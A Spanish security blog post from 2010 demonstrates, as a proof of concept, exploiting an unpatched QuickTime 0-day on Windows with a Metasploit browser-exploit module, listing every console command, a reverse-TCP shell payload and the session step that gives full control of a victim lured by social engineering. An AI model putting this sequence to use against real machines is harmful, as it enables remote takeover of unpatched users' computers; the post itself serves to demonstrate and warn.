Menú principal

jueves, 2 de septiembre de 2010

Explotando con Metasploit el 0-day en QuickTime publicado por Reversemode

Como ya indicamos en entradas anteriores, Ruben Santamarta investigador de seguridad, ha sacado a la luz un 0day que afecta a las últimas versiones de QuickTime en todas las versiones de Windows.

La noticia ha cogido tanta expectación, que los desarrolladores de metasploit han tardado apenas un día en liberar un módulo para su framework.

En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).


Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:

·         use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
·         set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
·         set SRVPORT 80 (Puerto local del servicio)
·         set URIPATH juegos (Uri del servicio)
·         set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
·         set LHOST 192.168.0.162 (IP donde se conectará la víctima)
·         set LPORT 5050 (Puerto local de escucha)
·         exploit (Ejecutamos el exploit)

Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.


Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.


Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.


Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

·         sessions -i 2

De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.


Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.

Si quieres aprender más sobre cómo funciona Metasploit, puedes leer el libro de Pablo González Metasploit para Pentesters

2 comentarios:

  1. error: set payload/windows/shell/reverse_tcp
    debe ser: set payload windows/shell/reverse_tcp

    Por cierto, no funciona en windows 7, DEP bloquea la ejecución del script en internet explorer.

    ResponderEliminar
  2. @Anónimo: Gracias, ya está solucionado.

    Sí, el exploit desarrollado para metasploit solo permite las siguientes versiones: Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3.

    Un Saludo!

    ResponderEliminar

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares